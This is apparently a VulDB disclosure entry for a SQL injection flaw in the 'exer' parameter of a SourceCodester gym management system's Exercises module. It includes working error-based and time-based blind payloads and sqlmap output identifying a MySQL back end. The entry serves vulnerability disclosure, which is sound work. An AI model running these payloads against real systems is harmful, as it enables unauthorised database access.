| Title | Gym-Management-Exercises-Sqlinjection |
|---|
| Description | Gym-Management-Exercises-Sqlinjection
After logging in to the background
The injection point is in Exercises module
Injection details:
---
Parameter: exer (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: exer=26'||(SELECT 0x77616550 WHERE 7593=7593 AND (SELECT 2167 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(2167=2167,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: exer=26'||(SELECT 0x737a4e63 WHERE 5129=5129 AND (SELECT 8000 FROM (SELECT(SLEEP(5)))ZYTF))||'
---
[16:52:27] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP, PHP 7.3.4
back-end DBMS: MySQL >= 5.0 |
|---|
| Source | ⚠️ https://github.com/gdianq/Gym-Management-Exercises-Sqlinjection/blob/main/README.md |
|---|
| User | gdianq (UID 30613) |
|---|
| Submission | 08/07/2022 11:00 (4 years ago) |
|---|
| Moderation | 08/07/2022 21:46 (11 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 205827 [SourceCodester Gym Management System Exercises exer sql injection] |
|---|
| Points | 20 |
|---|